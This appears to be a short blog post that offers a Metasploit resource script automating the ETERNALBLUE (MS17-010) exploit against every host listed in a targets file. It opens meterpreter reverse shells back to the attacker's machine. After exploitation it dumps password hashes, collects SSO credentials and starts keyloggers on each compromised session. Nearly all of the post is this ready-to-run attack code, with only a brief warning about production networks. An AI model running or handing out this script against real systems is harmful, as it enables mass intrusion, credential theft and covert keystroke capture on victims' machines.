Automating ETERNALBLUE with Metasploit
Since Metasploit exploit modules only support a single RHOST, I decided to put together a resource script to automate my ETERNALBLUE attacks. I've coded it to use targets.txt as an input file and to dump hashes, passwords and keystrokes during post-exploitation. Each target should be on a separate line in targets.txt.
If you put this script in a file called eternalblue.rc, you can tell Metasploit to run it, using one of the following methods:
Without Metasploit already running: msfconsole -r eternalblue.rc
With Metasploit already running: resource eternalblue.rc
The first Ruby block within this script loops over the RHOST value, and the second Ruby block loops over the session value within the keylog_recorder module. Don't forget to replace <attack-source-ip> with your attack box IP. Please use care when running this on a production network, as ETERNALBLUE can be destructive in some cases.
Enjoy the script!
# Exploit module and payload; replace <attack-source-ip> with the IP of the attack box
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set lhost <attack-source-ip>
<ruby>
# Loop over every line of targets.txt (one host per line) and launch the
# exploit as a background job for each. The line is stripped first: without
# that, the trailing newline is passed through to RHOST and the run fails.
File.foreach("targets.txt") do |line|
  the_target = line.strip
  next if the_target.empty?   # skip blank lines
  run_single("set rhost #{the_target}")
  run_single("run -jz")
  run_single("sleep 10s")
end
</ruby>
# Post-exploitation: run the credential modules against every open session
sessions
sessions -s post/windows/gather/hashdump
sessions -s post/windows/gather/credentials/sso
use post/windows/capture/keylog_recorder
set migrate true
<ruby>
# Loop over the session list and start the keylogger as a job on each session
framework.sessions.each do |num, session|
  run_single("set session #{num}")
  run_single("run -j")
  run_single("sleep 10s")
end
</ruby>
sessions
jobs -l